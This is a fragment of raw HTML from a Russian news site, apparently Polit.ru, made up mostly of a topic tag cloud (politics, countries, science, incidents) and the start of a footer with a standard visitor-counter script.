
  

  

  

  

  
  <a href="/tag/Belarus/" class="weight9">Белоруссия</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/besporyadki/" class="weight8">беспорядки</a>
  

  

  

  

  

  

  

  
  <a href="/tag/biznes/" class="weight8">бизнес</a>
  

  

  

  

  
  <a href="/tag/biology/" class="weight9">биология </a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/izr/" class="weight9">ближневосточный конфликт</a>
  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/football_fans/" class="weight7">болельщики</a>
  

  

  

  
  <a href="/tag/bolotnoe-delo/" class="weight8">«болотное дело»</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/boris-nemcov/" class="weight8">Борис Немцов</a>
  

  

  

  

  

  

  

  
  <a href="/tag/braziliya/" class="weight8">Бразилия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/velikaya-otechestvennaya-vojna/" class="weight6">Великая Отечественная война</a>
  

  

  
  <a href="/tag/UK/" class="weight10">Великобритания</a>
  

  

  

  
  <a href="/tag/venesuela/" class="weight7">Венесуэла</a>
  

  

  

  

  

  

  
  <a href="/tag/verhovnaya-rada/" class="weight9">Верховная Рада</a>
  

  

  

  

  
  <a href="/tag/vzryv/" class="weight10">взрыв</a>
  

  
  <a href="/tag/bribe/" class="weight7">взятка</a>
  

  
  <a href="/tag/videon_lectures/" class="weight6">видеозаписи публичных лекций «Полит.ру»</a>
  

  
  <a href="/tag/video/" class="weight9">видео «Полит.ру»</a>
  

  

  

  
  <a href="/tag/vizovyj-rezhim/" class="weight6">визовый режим</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/viktor-yanukovich/" class="weight8">Виктор Янукович</a>
  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vkontakte/" class="weight6">«ВКонтакте»</a>
  

  
  <a href="/tag/airborne/" class="weight7">ВКС</a>
  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vladimir-zhirinovskij/" class="weight5">Владимир Жириновский</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vladimir-putin/" class="weight11 force-hi">Владимир Путин</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vmf/" class="weight7">ВМФ</a>
  

  

  

  

  

  

  

  
  <a href="/tag/air_force/" class="weight8">военная авиация</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vtoraya-mirovaya-vojna/" class="weight6">Вторая мировая война</a>
  

  

  
  <a href="/tag/vuzy/" class="weight7">вузы</a>
  

  

  

  
  <a href="/tag/vybory/" class="weight11 force-hi">выборы</a>
  

  
  <a href="/tag/vybory-gubernatorov/" class="weight5">выборы губернаторов</a>
  

  
  <a href="/tag/vybory-mera-moskvy/" class="weight7">выборы мэра Москвы</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/gazovaya-promyshlennost/" class="weight9">газовая промышленность</a>
  

  

  

  
  <a href="/tag/gazprom/" class="weight10">«Газпром»</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/genetics/" class="weight5">генетика</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/genprokuratura/" class="weight9">Генпрокуратура</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/germaniya/" class="weight9">Германия</a>
  

  

  

  

  
  <a href="/tag/gibdd/" class="weight6">ГИБДД</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/homosexuality/" class="weight5">гомосексуализм</a>
  

  

  

  

  

  

  

  
  <a href="/tag/gosbyudzhet/" class="weight8">госбюджет</a>
  

  
  <a href="/tag/gosdep/" class="weight6">Госдеп</a>
  

  
  <a href="/tag/gosduma/" class="weight11 force-hi">Госдума</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/grazhdanskaya-aviaciya/" class="weight10 force-hi">гражданская авиация</a>
  

  

  

  

  
  <a href="/tag/greece/" class="weight9">Греция</a>
  

  

  

  

  

  
  <a href="/tag/greenpeace/" class="weight6">Гринпис</a>
  

  

  

  

  
  <a href="/tag/georgia/" class="weight10 force-hi">Грузия</a>
  

  

  

  

  
  <a href="/tag/gumanitarnaya-pomosh/" class="weight5">гуманитарная помощь</a>
  

  
  <a href="/tag/liberal_arts/" class="weight8">гуманитарные и социальные  науки</a>
  

  

  

  

  

  
  <a href="/tag/dagestan/" class="weight9">Дагестан</a>
  

  

  
  <a href="/tag/dalnij-vostok/" class="weight7">Дальний Восток</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/den-pobedy/" class="weight5">День Победы</a>
  

  

  

  
  <a href="/tag/deti/" class="weight9">дети</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/dmitriy_medvedev/" class="weight10">Дмитрий Медведев</a>
  

  

  
  <a href="/tag/dmitrij-peskov/" class="weight8">Дмитрий Песков</a>
  

  
  <a href="/tag/dmitrij-rogozin/" class="weight7">Дмитрий Рогозин</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/dollar/" class="weight9">доллар</a>
  

  

  

  

  

  
  <a href="/tag/domodedovo/" class="weight1">Домодедово</a>
  

  

  

  
  <a href="/tag/doneck/" class="weight11 force-hi">Донецк</a>
  

  

  

  

  

  
  <a href="/tag/draka/" class="weight7">драка</a>
  

  

  

  

  
  <a href="/tag/dtp/" class="weight10 force-hi">ДТП</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/evgeniya-vasileva/" class="weight7">Евгения Васильева</a>
  

  

  

  
  <a href="/tag/evro/" class="weight9">евро</a>
  

  

  

  

  

  
  <a href="/tag/evromajdan/" class="weight10">Евромайдан</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/EU/" class="weight10 force-hi">Евросоюз</a>
  

  
  <a href="/tag/egipet/" class="weight9">Египет</a>
  

  

  
  <a href="/tag/obraz/" class="weight9">ЕГЭ</a>
  

  
  <a href="/tag/edinaya-rossiya/" class="weight8">«Единая Россия»</a>
  

  

  

  

  
  <a href="/tag/ekaterinburg/" class="weight6">Екатеринбург</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/natural_sciences/" class="weight8 force-hi macrotag">естественные и точные науки</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/zhkh/" class="weight7">ЖКХ</a>
  

  

  

  
  <a href="/tag/zhurnalisty/" class="weight8">журналисты</a>
  

  

  

  

  
  <a href="/tag/foreign_agents_law/" class="weight6">закон об «иностранных агентах»</a>
  

  

  
  <a href="/tag/zakonotvorchestvo/" class="weight10">законотворчество</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/healthcare_russia/" class="weight6">здравоохранение в России</a>
  

  

  
  <a href="/tag/zemletryasenie/" class="weight8">землетрясение</a>
  

  

  
  <a href="/tag/zenit/" class="weight6">«Зенит»</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/israel/" class="weight9">Израиль</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/India/" class="weight8">Индия</a>
  

  
  <a href="/tag/indonesia/" class="weight4">Индонезия</a>
  

  

  
  <a href="/tag/innovation/" class="weight7">инновации</a>
  

  

  

  

  

  

  

  
  <a href="/tag/science_interview/" class="weight5">Интервью ученых</a>
  

  
  <a href="/tag/internet/" class="weight10 force-hi">интернет</a>
  

  

  
  <a href="/tag/inflation/" class="weight2">инфляция</a>
  

  

  

  

  

  
  <a href="/tag/irak/" class="weight8">Ирак</a>
  

  

  
  <a href="/tag/iraqafterwar/" class="weight9">Ирак после войны</a>
  

  
  <a href="/tag/iran/" class="weight9">Иран</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/irkutskaya-oblast/" class="weight6">Иркутская область</a>
  

  

  

  

  
  <a href="/tag/islam/" class="weight8">ислам</a>
  

  
  <a href="/tag/islamskoe-gosudarstvo-iraka-i-levanta/" class="weight9">«Исламское государство»</a>
  

  

  
  <a href="/tag/spain/" class="weight7">Испания</a>
  

  

  

  

  
  <a href="/tag/history/" class="weight9">история</a>
  

  

  

  

  

  
  <a href="/tag/istoria/" class="weight6">История человечества</a>
  

  
  <a href="/tag/italy/" class="weight8">Италия</a>
  

  

  

  

  
  <a href="/tag/jemen/" class="weight6">Йемен</a>
  

  

  

  

  

  

  
  <a href="/tag/kazan/" class="weight7">Казань</a>
  

  
  <a href="/tag/kazahstan/" class="weight8">Казахстан</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/canada/" class="weight7">Канада</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/kiev/" class="weight9">Киев</a>
  

  

  

  

  
  <a href="/tag/kino/" class="weight10">кино</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/china/" class="weight10">Китай</a>
  

  

  

  

  
  <a href="/tag/climate/" class="weight6">Климат Земли, атмосферные явления</a>
  

  

  

  

  
  <a href="/tag/kndr/" class="weight9">КНДР</a>
  

  

  
  <a href="/tag/books/" class="weight4">Книга. Знание</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/korablekrushenie/" class="weight7">кораблекрушение</a>
  

  

  

  

  

  

  
  <a href="/tag/corruption/" class="weight10">коррупция</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/space/" class="weight10 force-hi">космос</a>
  

  

  

  

  
  <a href="/tag/kprf/" class="weight6">КПРФ</a>
  

  
  <a href="/tag/theft/" class="weight6">кража</a>
  

  

  

  

  

  
  <a href="/tag/krasnodarskij-kraj/" class="weight7">Краснодарский край</a>
  

  

  

  

  

  
  <a href="/tag/debts/" class="weight8">кредиты</a>
  

  
  <a href="/tag/kreml/" class="weight7">Кремль</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/helicopter_crush/" class="weight6">крушение вертолета</a>
  

  

  

  

  
  <a href="/tag/krym/" class="weight10 force-hi">Крым</a>
  

  

  
  <a href="/tag/krymskij-krizis/" class="weight9">крымский кризис</a>
  

  

  

  

  

  
  <a href="/tag/kultura/" class="weight7 force-hi">культура</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/latviya/" class="weight7">Латвия</a>
  

  

  

  

  
  <a href="/tag/lgbt/" class="weight7">ЛГБТ</a>
  

  
  <a href="/tag/ldpr/" class="weight7">ЛДПР</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/lesnye-pozhary/" class="weight5">лесные пожары</a>
  

  

  

  

  

  

  

  
  <a href="/tag/liviya/" class="weight6">Ливия</a>
  

  

  

  

  

  

  

  
  <a href="/tag/lithuania/" class="weight5">Литва</a>
  

  
  <a href="/tag/literatura/" class="weight7">литература</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/lugansk/" class="weight10">Луганск</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/malajziya/" class="weight7">Малайзия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mvd/" class="weight10">МВД</a>
  

  
  <a href="/tag/imf/" class="weight4">МВФ</a>
  

  

  

  

  

  

  
  <a href="/tag/media/" class="weight10">медиа</a>
  

  
  <a href="/tag/medicine/" class="weight10 force-hi">медицина</a>
  

  

  
  <a href="/tag/interdisciplinary_research/" class="weight0 force-hi macrotag">междисциплинарные исследования</a>
  

  

  

  

  

  
  <a href="/tag/meksika/" class="weight7">Мексика</a>
  

  

  

  
  <a href="/tag/memoriya/" class="weight8">Мемория</a>
  

  

  

  

  
  <a href="/tag/metro/" class="weight9">метро</a>
  

  

  

  

  

  
  <a href="/tag/gastarbeiter/" class="weight9">мигранты</a>
  

  
  <a href="/tag/mid-rossii/" class="weight10">МИД России</a>
  

  

  

  

  
  <a href="/tag/minzdrav/" class="weight5">Минздрав</a>
  

  

  

  

  
  <a href="/tag/minkult/" class="weight5">Минкульт</a>
  

  
  <a href="/tag/minoborony/" class="weight10">Минобороны</a>
  

  
  <a href="/tag/minobrnauki/" class="weight7">Минобрнауки</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/minfin/" class="weight8">Минфин</a>
  

  
  <a href="/tag/minekonomrazvitiya/" class="weight8">Минэкономразвития</a>
  

  

  
  <a href="/tag/minjust/" class="weight6">Минюст</a>
  

  
  <a href="/tag/crisis/" class="weight10">мировой экономический кризис</a>
  

  

  
  <a href="/tag/mistral/" class="weight4">«Мистраль»</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mihail-saakashvili/" class="weight5">Михаил Саакашвили</a>
  

  

  

  

  

  
  <a href="/tag/mihail-hodorkovskij/" class="weight4">Михаил Ходорковский</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/iss/" class="weight9">МКС</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/moldaviya/" class="weight6">Молдавия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mosgorsud/" class="weight7">Мосгорсуд</a>
  

  

  
  <a href="/tag/moskva/" class="weight12 force-hi">Москва</a>
  

  

  

  
  <a href="/tag/moskovskaya-oblast/" class="weight9">Московская область</a>
  

  

  

  

  

  

  

  
  <a href="/tag/moshennichestvo/" class="weight9">мошенничество</a>
  

  

  

  

  

  

  

  
  <a href="/tag/music/" class="weight9">музыка</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/mchs/" class="weight9">МЧС</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/navodnenie/" class="weight7">наводнение</a>
  

  

  

  

  

  

  
  <a href="/tag/nalogi/" class="weight7">налоги</a>
  

  

  

  

  
  <a href="/tag/nanotechnology_topic/" class="weight7">нанотехнологии</a>
  

  
  <a href="/tag/drugs/" class="weight9">наркотики</a>
  

  

  

  

  
  <a href="/tag/nasa/" class="weight4 force-hi">НАСА</a>
  

  

  

  

  

  
  <a href="/tag/nauka/" class="weight6">наука</a>
  

  

  
  <a href="/tag/science_ru/" class="weight10 force-hi">Наука в современной России</a>
  

  

  

  
  <a href="/tag/naftogaz-ukrainy/" class="weight8">«Нафтогаз Украины»</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nekrolog/" class="weight7">некролог</a>
  

  

  

  

  

  
  <a href="/tag/bunt/" class="weight3">Нерусский бунт</a>
  

  
  <a href="/tag/oil/" class="weight9">нефть</a>
  

  

  
  <a href="/tag/nigeria/" class="weight5">Нигерия</a>
  

  
  <a href="/tag/netherlands/" class="weight7">Нидерланды</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/Nobel_prize/" class="weight6 force-hi">Нобелевская премия</a>
  

  

  

  

  

  

  

  
  <a href="/tag/novosibirsk/" class="weight7">Новосибирск</a>
  

  

  

  
  <a href="/tag/newtech/" class="weight8">Новые технологии, инновации</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/new-york/" class="weight4">Нью-Йорк</a>
  

  

  

  

  

  

  

  
  <a href="/tag/oboronservis/" class="weight8">«Оборонсервис»</a>
  

  

  
  <a href="/tag/niu/" class="weight9">образование</a>
  

  

  

  
  <a href="/tag/obse/" class="weight8">ОБСЕ</a>
  

  

  

  

  

  
  <a href="/tag/obshestvennyj-transport/" class="weight4">общественный транспорт</a>
  

  
  <a href="/tag/society/" class="weight0 force-hi macrotag">общество</a>
  

  

  

  

  
  <a href="/tag/robbery/" class="weight8">ограбление</a>
  

  

  

  
  <a href="/tag/odessa/" class="weight7">Одесса</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/olympics/" class="weight8">Олимпийские игры</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/UN/" class="weight9">ООН</a>
  

  

  

  

  

  
  <a href="/tag/oppoziciya/" class="weight8">оппозиция</a>
  

  
  <a href="/tag/oprosy/" class="weight10">опросы</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/arms/" class="weight9">оружие</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/otstavki-naznacheniya/" class="weight9">отставки-назначения</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/pakistan/" class="weight6">Пакистан</a>
  

  

  
  <a href="/tag/palestinskaya-avtonomiya/" class="weight6">Палестинская автономия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/pensionnaya-reforma/" class="weight7">пенсионная реформа</a>
  

  
  <a href="/tag/pentagon/" class="weight5">Пентагон</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/petr-poroshenko/" class="weight10">Петр Порошенко</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/pogranvojska/" class="weight6">погранвойска</a>
  

  

  

  
  <a href="/tag/pozhar/" class="weight10">пожар</a>
  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/police/" class="weight10 force-hi">полиция</a>
  

  

  

  

  
  <a href="/tag/polsha/" class="weight8">Польша</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/pravitelstvo/" class="weight10">правительство</a>
  

  

  
  <a href="/tag/pravo/" class="weight9">Право</a>
  

  

  

  

  
  <a href="/tag/pravyj-sektor/" class="weight6">«Правый сектор»</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/acab/" class="weight6">преступления полицейских</a>
  

  
  <a href="/tag/prestupnost/" class="weight9">преступность</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/incidents/" class="weight10 force-hi">происшествия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/publ_lect/" class="weight8">публичные лекции</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/ramzan-kadyrov/" class="weight8">Рамзан Кадыров</a>
  

  
  <a href="/tag/AOS/" class="weight7">РАН</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/kyrgyzstan/" class="weight7">Революция в Киргизии</a>
  

  

  

  

  

  
  <a href="/tag/rejtingi/" class="weight8">рейтинги</a>
  

  

  

  
  <a href="/tag/religiya/" class="weight7">религия</a>
  

  

  

  

  

  
  <a href="/tag/army_topic/" class="weight4">Реформа армии</a>
  

  

  

  
  <a href="/tag/rzhd/" class="weight8">РЖД</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/roskomnadzor/" class="weight7">Роскомнадзор</a>
  

  
  <a href="/tag/roskosmos/" class="weight8">Роскосмос</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/rospotrebnadzor/" class="weight7">Роспотребнадзор</a>
  

  

  

  

  
  <a href="/tag/rosselhoznadzor/" class="weight5">Россельхознадзор</a>
  

  
  <a href="/tag/rossijskaya-akademiya-nauk/" class="weight8">Российская академия наук</a>
  

  

  

  

  

  

  

  
  <a href="/tag/Russia/" class="weight11 force-hi">Россия</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/rostovskaya-oblast/" class="weight6">Ростовская область</a>
  

  

  

  

  

  

  
  <a href="/tag/rpc/" class="weight8">РПЦ</a>
  

  

  

  
  <a href="/tag/rubl/" class="weight9">рубль</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/russian_nationalists/" class="weight5">русские националисты</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/st_petersburgh/" class="weight10">Санкт-Петербург</a>
  

  
  <a href="/tag/sankcii/" class="weight10 force-hi">санкции</a>
  

  

  

  

  

  
  <a href="/tag/saudi_arabia/" class="weight5">Саудовская Аравия</a>
  

  

  

  
  <a href="/tag/sberbank/" class="weight7">Сбербанк</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/communications/" class="weight7">связь</a>
  

  
  <a href="/tag/telecom/" class="weight9">связь и телекоммуникации</a>
  

  
  <a href="/tag/sevastopol/" class="weight6">Севастополь</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/selskoe-hozyajstvo/" class="weight6">сельское хозяйство</a>
  

  

  

  
  <a href="/tag/separatizm/" class="weight10">сепаратизм</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/sergej-lavrov/" class="weight9">Сергей Лавров</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/sergej-sobyanin/" class="weight7">Сергей Собянин</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/sergey-shoigu/" class="weight7">Сергей Шойгу</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/siriya/" class="weight11 force-hi">Сирия</a>
  

  

  

  

  

  
  <a href="/tag/skolkovo/" class="weight7">Сколково</a>
  

  

  

  
  <a href="/tag/slavyansk/" class="weight7">Славянск</a>
  

  

  
  <a href="/tag/committee_of_inquiry/" class="weight10 force-hi">Следственный комитет</a>
  

  
  <a href="/tag/sledstvie/" class="weight7">следствие</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/sovet-federacii/" class="weight8">Совет Федерации</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/social_network/" class="weight7">социальные сети</a>
  

  

  

  
  <a href="/tag/sociology_russia/" class="weight7">Социология в России</a>
  

  

  
  <a href="/tag/sochi/" class="weight6">Сочи</a>
  

  
  <a href="/tag/sochi_olympics/" class="weight9">Сочи 2014</a>
  

  

  

  

  

  
  <a href="/tag/spartak/" class="weight5">«Спартак»</a>
  

  

  

  

  

  

  

  
  <a href="/tag/spravedlivaya-rossiya/" class="weight6">«Справедливая Россия»</a>
  

  
  <a href="/tag/sputnik/" class="weight7 force-hi">спутники</a>
  

  

  

  

  
  <a href="/tag/ussr_topic/" class="weight8">СССР</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/stihijnye-bedstviya/" class="weight8">стихийные бедствия</a>
  

  
  <a href="/tag/stix/" class="weight7">Стихотворения на случай</a>
  

  

  

  

  
  <a href="/tag/strelba/" class="weight8">стрельба</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/courts/" class="weight10 force-hi">суды</a>
  

  
  <a href="/tag/suicid/" class="weight7">суицид</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/usa/" class="weight12 force-hi">США</a>
  

  

  

  

  

  

  
  <a href="/tag/tailand/" class="weight7">Таиланд</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/tatarstan/" class="weight5">Татарстан</a>
  

  

  

  

  

  
  <a href="/tag/theatre/" class="weight5">театр</a>
  

  

  

  
  <a href="/tag/TV/" class="weight9">телевидение</a>
  

  

  

  

  

  

  

  
  <a href="/tag/terakt/" class="weight9">теракт</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/terrorizm/" class="weight11 force-hi">терроризм</a>
  

  

  
  <a href="/tag/technology/" class="weight0 macrotag">технологии</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/transportation/" class="weight8">транспорт</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/turizm/" class="weight9">туризм</a>
  

  

  
  <a href="/tag/turciya/" class="weight9">Турция</a>
  

  

  
  <a href="/tag/dungeons_and_dragons/" class="weight8">тюрьмы и колонии</a>
  

  
  <a href="/tag/murder/" class="weight10 force-hi">убийство</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/ukraine/" class="weight13 force-hi">Украина</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/federalnaya-migracionnaya-sluzhba/" class="weight7">Федеральная миграционная служба</a>
  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/physics/" class="weight7">физика</a>
  

  

  

  

  

  

  

  
  <a href="/tag/finland/" class="weight5">Финляндия</a>
  

  
  <a href="/tag/fifa/" class="weight7">ФИФА</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/fondovaya-birzha/" class="weight8">фондовая биржа</a>
  

  

  

  

  

  

  
  <a href="/tag/photorep/" class="weight6">Фоторепортаж</a>
  

  
  <a href="/tag/francois_hollande/" class="weight5">Франсуа Олланд</a>
  

  

  
  <a href="/tag/france/" class="weight10">Франция</a>
  

  

  
  <a href="/tag/fsb/" class="weight8">ФСБ</a>
  

  
  <a href="/tag/fsin/" class="weight7">ФСИН</a>
  

  
  <a href="/tag/fskn/" class="weight4">ФСКН</a>
  

  

  

  

  

  

  
  <a href="/tag/soccer/" class="weight11 force-hi">футбол</a>
  

  

  

  
  <a href="/tag/habarovskij-kraj/" class="weight7">Хабаровский край</a>
  

  

  

  

  
  <a href="/tag/hakery/" class="weight8">хакеры</a>
  

  

  

  

  
  <a href="/tag/harkov/" class="weight6">Харьков</a>
  

  

  

  

  

  

  

  
  <a href="/tag/chemical_weapon/" class="weight7">химическое оружие</a>
  

  

  

  

  

  

  

  
  <a href="/tag/hokkej/" class="weight8">хоккей</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/centrobank/" class="weight9">Центробанк</a>
  

  

  

  

  

  
  <a href="/tag/vzr/" class="weight0 force-hi macrotag">Цикл бесед &quot;Взрослые люди&quot;</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/chelyabinskaya-oblast/" class="weight6">Челябинская область</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/chechnya/" class="weight10 force-hi">Чечня</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/shahty/" class="weight4">шахты</a>
  

  
  <a href="/tag/switzerland/" class="weight6">Швейцария</a>
  

  
  <a href="/tag/sweden/" class="weight4">Швеция</a>
  

  

  

  
  <a href="/tag/schcool/" class="weight8">школа</a>
  

  

  

  

  

  
  <a href="/tag/shpionazh/" class="weight7">шпионаж</a>
  

  

  

  

  

  
  <a href="/tag/ebola/" class="weight8">Эбола</a>
  

  

  

  

  

  
  <a href="/tag/edvard-snouden/" class="weight8">Эдвард Сноуден</a>
  

  

  

  

  
  <a href="/tag/ecology/" class="weight8">экология</a>
  

  
  <a href="/tag/economy/" class="weight9">экономика</a>
  

  

  

  
  <a href="/tag/ekonomicheskij-krizis/" class="weight8">экономический кризис</a>
  

  

  

  

  

  
  <a href="/tag/extremismus/" class="weight7">экстремизм</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/south_korea/" class="weight8">Южная Корея</a>
  

  

  

  

  

  
  <a href="/tag/yukos/" class="weight10">ЮКОС</a>
  

  
  <a href="/tag/yuliya-timoshenko/" class="weight5">Юлия Тимошенко</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nuclear_weapon/" class="weight7">ядерное оружие</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/japan/" class="weight9">Япония</a>
  

  

  

  

  

</div>



  
</div>

      
    
  
  </div>




    <!--BEGIN #footer-->

    <!--BEGIN #footer-->
    <div style="margin: 15px 0 25px;">
      <!--LiveInternet counter--><script type="text/JavaScript"><!--
        document.write('<a href="http://www.liveinternet.ru/click" target=liveinternet rel="nofollow"><img src="http://counter.yadro.ru/hit?t45.6;r'+
          escape(document.referrer)+((typeof(screen)=='undefined')?'':';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
          screen.colorDepth:screen.pixelDepth))+';'+Math.random()+'" border=0 width=31 height=31 alt="liveinternet.ru"></a>')
      //--></script><!--/LiveInternet-->
    </div>
    <div class="info-container stop">
      <div class="first">
        <h4 class="subject block-subject"><a href="/rubric/redakciya/" rel="nofollow" style="color:#FFF;">Редакция</a></h4>
